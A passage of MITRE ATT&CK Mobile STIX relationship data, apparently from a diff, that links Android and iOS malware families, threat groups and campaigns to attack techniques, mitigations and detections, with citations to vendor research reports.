"https://securelist.com/mobile-banker-riltok/91374/", + "description": "Tatyana Shishkova. (2019, June 25). Riltok mobile Trojan: A banker with global reach. Retrieved August 7, 2019." + } + ], + "modified": "2019-09-18T13:44:13.453Z", + "description": "[Riltok](https://attack.mitre.org/software/S0403) injects input to set itself as the default SMS handler by clicking the appropriate places on the screen. It can also close or minimize targeted antivirus applications and the device security settings screen.(Citation: Kaspersky Riltok June 2019)", + "relationship_type": "uses", + "source_ref": "malware--c0efbaae-9e7d-4716-a92d-68373aac7424", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--44304163-9a44-4760-bd04-0e14adb33299", + "created": "2022-04-01T15:13:40.779Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Trend Micro iOS URL Hijacking", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/ios-url-scheme-susceptible-to-hijacking/", + "description": "L. Wu, Y. Zhou, M. Li. (2019, July 12). iOS URL Scheme Susceptible to Hijacking. Retrieved September 11, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "iOS 11 introduced a first-come-first-served principle for URIs, allowing only the prior installed app to be launched via the URI.(Citation: Trend Micro iOS URL Hijacking) Android 6 introduced App Links.", + "modified": "2022-04-01T15:13:40.779Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--233fe2c0-cb41-4765-b454-e0087597fbce", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0b693e45-cc20-45a9-846f-2f5f4d3a3253", + "type": "relationship", + "created": "2020-12-31T18:25:05.178Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020." + } + ], + "modified": "2020-12-31T18:25:05.178Z", + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) has fingerprinted devices to uniquely identify them.(Citation: CYBERWARCON CHEMISTGAMES)", + "relationship_type": "uses", + "source_ref": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--df337ad4-c88e-425f-b869-ecac29674bf4", + "type": "relationship", + "created": "2021-03-25T16:39:40.200Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020." + } + ], + "modified": "2021-03-25T16:39:40.200Z", + "description": "(Citation: CYBERWARCON CHEMISTGAMES)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--9e3921a8-a9e1-48c4-9b61-ff190c104f63", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/", + "description": "Veo Zhang. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. Retrieved December 22, 2016.", + "source_name": "TrendMicro-RCSAndroid" + } + ], + "modified": "2019-08-09T17:53:48.793Z", + "description": "[RCSAndroid](https://attack.mitre.org/software/S0295) can monitor clipboard content.(Citation: TrendMicro-RCSAndroid)", + "relationship_type": "uses", + "source_ref": "malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b", + "target_ref": "attack-pattern--c4b96c0b-cb58-497a-a1c2-bb447d79d692", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--07fd2c39-c3e2-4044-b00b-71250cd7df2e", + "created": "2022-03-30T18:15:03.625Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T18:15:03.625Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "target_ref": "attack-pattern--79cb02f4-ac4e-4335-8b51-425c9573cce1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4c6f1475-3b92-4a37-8bb5-4dcc69660b11", + "created": "2022-09-29T20:08:54.389Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cylance Dust Storm", + "description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.", + "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-30T18:38:37.195Z", + "description": "During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors used Android backdoors capable of exfiltrating specific files directly from the infected devices.(Citation: Cylance Dust Storm)", + "relationship_type": "uses", + "source_ref": "campaign--4603cf2f-06d0-4970-9c5d-5071b08c817f", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b49ecb71-92b3-4813-be4d-9f8c2aa67ccd", + "created": "2021-02-08T16:36:20.707Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021.", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:05:01.189Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has installed malicious MDM profiles on iOS devices as part of Operation ROCK.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a7b276ac-6f07-4d1f-8d24-dc5682acf62d", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. (2017, April 3). Pegasus for Android: the other side of the story emerges. Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:13:36.481Z", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) accesses calendar entries.(Citation: Lookout-PegasusAndroid)", + "relationship_type": "uses", + "source_ref": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "target_ref": "attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c5cb9fb4-2593-412f-82f8-a04a125bd429", + "created": "2022-04-01T18:51:28.859Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Security updates frequently contain patches to vulnerabilities that can be exploited for root access.", + "modified": "2022-04-01T18:51:28.859Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3498d304-48e3-4fe4-a3ab-fc261104f413", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "source_name": "Lookout-StealthMango" + } + ], + "modified": "2019-08-09T17:59:49.094Z", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) can record audio using the device microphone.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--8d027310-93a0-4046-b7ad-d1f461f30838", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/", + "description": "Veo Zhang. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. Retrieved December 22, 2016.", + "source_name": "TrendMicro-RCSAndroid" + } + ], + "modified": "2019-08-09T17:53:48.783Z", + "description": "[RCSAndroid](https://attack.mitre.org/software/S0295) has the ability to dynamically download and execute new code at runtime.(Citation: TrendMicro-RCSAndroid)", + "relationship_type": "uses", + "source_ref": "malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--bf901bab-3caa-4d05-a859-d9fb4d838304", + "type": "relationship", + "created": "2019-10-10T15:27:22.091Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "source_name": "Lookout-StealthMango" + } + ], + "modified": "2019-10-10T15:27:22.091Z", + "description": "[Tangelo](https://attack.mitre.org/software/S0329) accesses browser history, pictures, and videos.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--35aae10a-97c5-471a-9c67-02c231a7a31a", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5dd9e0aa-e4dc-4776-9580-5a765c2cc08d", + "created": "2023-02-06T18:52:40.543Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:14:41.449Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can intercept SMS messages containing two factor authentication codes.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--721cc30c-74cf-4eed-89a8-7a8e63e6c0e1", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Tripwire-MazarBOT", + "description": "Graham Cluley. (2016, February 16). Android users warned of malware attack spreading via SMS. Retrieved December 23, 2016.", + "url": "https://www.tripwire.com/state-of-security/security-data-protection/android-malware-sms/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:27:47.788Z", + "description": "[MazarBOT](https://attack.mitre.org/software/S0303) can intercept two-factor authentication codes sent by online banking apps.(Citation: Tripwire-MazarBOT)", + "relationship_type": "uses", + "source_ref": "malware--5ddf81ea-2c06-497b-8c30-5f1ab89a40f9", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a93ee044-bd5d-48f3-972e-0abab780c35c", + "created": "2023-02-08T20:05:06.786Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "trendmicro_tianyspy_0122", + "description": "Trend Micro. (2022, January 25). TianySpy Malware Uses Smishing Disguised as Message From Telco. Retrieved January 11, 2023.", + "url": "https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:21:22.070Z", + "description": "[TianySpy](https://attack.mitre.org/software/S1056) can steal information via malicious JavaScript.(Citation: trendmicro_tianyspy_0122)", + "relationship_type": "uses", + "source_ref": "malware--fd6d56b2-d84e-4d2a-b37d-d4678d3e08a6", + "target_ref": "attack-pattern--29f1f56c-7b7a-4c14-9e39-59577ea2743c", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b53d1c92-b71f-434e-aa4f-08b8db765248", + "type": "relationship", + "created": "2019-07-10T15:25:57.604Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + } + ], + "modified": "2019-08-12T17:30:07.572Z", + "description": "[FinFisher](https://attack.mitre.org/software/S0182) tracks the latitude and longitude coordinates of the infected device.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--a5528622-3a8a-4633-86ce-8cdaf8423858", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c78a3e66-b7aa-4feb-bc18-b8af77f27a47", + "created": "2023-03-20T15:20:11.652Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:20:11.652Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--4454a696-7619-40ee-971b-cbf646e4ee61", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout-EnterpriseApps", + "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/", + "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. Retrieved December 19, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[PJApps](https://attack.mitre.org/software/S0291) has the capability to send messages to premium SMS messages.(Citation: Lookout-EnterpriseApps)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--c709da93-20c3-4d17-ab68-48cba76b2137", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e29d91f0-ebee-481d-9344-702c90775109", + "type": "relationship", + "created": "2020-05-07T15:33:32.928Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CheckPoint Agent Smith", + "url": "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/", + "description": "A. Hazum, F. He, I. Marom, B. Melnykov, A. Polkovnichenko. (2019, July 10). Agent Smith: A New Species of Mobile Malware. Retrieved May 7, 2020." + } + ], + "modified": "2020-05-07T15:33:32.928Z", + "description": "[Agent Smith](https://attack.mitre.org/software/S0440) can inject fraudulent ad modules into existing applications on a device.(Citation: CheckPoint Agent Smith)", + "relationship_type": "uses", + "source_ref": "malware--a6228601-03f6-4949-ae22-c1087627a637", + "target_ref": "attack-pattern--d3bc5020-f6a2-41c0-8ccb-5e563101b60c", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7fcfc36b-bebc-481f-b9af-b65008b045ec", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "BankInfoSecurity-BackDoor", + "url": "http://www.bankinfosecurity.com/did-chinese-spyware-linger-in-us-phones-a-9534", + "description": "Jeremy Kirk. (2016, November 16). Why Did Chinese Spyware Linger in U.S. Phones?. Retrieved February 6, 2017." + }, + { + "source_name": "NYTimes-BackDoor", + "url": "https://www.nytimes.com/2016/11/16/us/politics/china-phones-software-security.html", + "description": "Matt Apuzzo and Michael S. Schmidt. (2016, November 15). Secret Back Door in Some U.S. Phones Sent Data to China, Analysts Say. Retrieved February 6, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Adups](https://attack.mitre.org/software/S0309) was pre-installed on Android devices from some vendors.(Citation: NYTimes-BackDoor)(Citation: BankInfoSecurity-BackDoor)", + "modified": "2022-04-19T15:46:20.166Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--f6ac21b6-2592-400c-8472-10d0e2f1bfaf", + "target_ref": "attack-pattern--9558a84e-2d5e-4872-918e-d847494a8ffc", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5b235ed4-548d-49f2-ae01-1874666e6747", + "created": "2022-03-30T19:51:56.543Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T19:51:56.543Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "target_ref": "attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--dc7ef843-a073-4e23-b717-c505d4863b02", + "created": "2023-03-20T18:53:58.856Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:53:58.856Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--cbf17fea-141e-44b8-831c-b3cc41066420", + "type": "relationship", + "created": "2021-01-20T16:01:19.409Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Trend Micro Anubis", + "url": "https://www.trendmicro.com/en_us/research/19/a/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics.html", + "description": "K. Sun. (2019, January 17). Google Play Apps Drop Anubis, Use Motion-based Evasion. Retrieved January 20, 2021." + } + ], + "modified": "2021-01-20T16:01:19.409Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can download attacker-specified APK files.(Citation: Trend Micro Anubis)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1cca5e17-80ae-4b6e-8919-2768153aa966", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "PaloAlto-Xbot", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/", + "description": "Cong Zheng, Claud Xiao and Zhi Xu. (2016, February 18). New Android Trojan “Xbot” Phishes Credit Cards and Bank Accounts, Encrypts Devices for Ransom. Retrieved December 21, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Xbot](https://attack.mitre.org/software/S0298) uses phishing pages mimicking Google Play's payment interface as well as bank login pages.(Citation: PaloAlto-Xbot)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "tool--da21929e-40c0-443d-bdf4-6b60d15448b4", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--16955c8e-65ab-4c9a-a8b1-bec4d5a45f8d", + "type": "relationship", + "created": "2021-10-01T14:42:48.740Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." + } + ], + "modified": "2021-10-12T13:51:41.045Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can collect images stored on the device and browser history.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--2e2d1ffa-f6df-4d3c-b99b-f7b8baff53e8", + "type": "relationship", + "created": "2019-09-04T15:38:56.994Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "FlexiSpy-Features", + "url": "https://www.flexispy.com/en/features-overview.htm", + "description": "FlexiSpy. (n.d.). FlexiSpy Monitoring Features. Retrieved September 4, 2019." + } + ], + "modified": "2019-09-10T14:59:26.171Z", + "description": " [FlexiSpy](https://attack.mitre.org/software/S0408) can take screenshots of other applications.(Citation: FlexiSpy-Features) ", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--03ff6271-d7bc-40f3-b83d-25c541333694", + "type": "relationship", + "created": "2019-11-19T17:32:20.701Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2019-12-26T16:14:33.468Z", + "description": "If a user sees a persistent notification they do not recognize, they should uninstall the source application and look for other unwanted 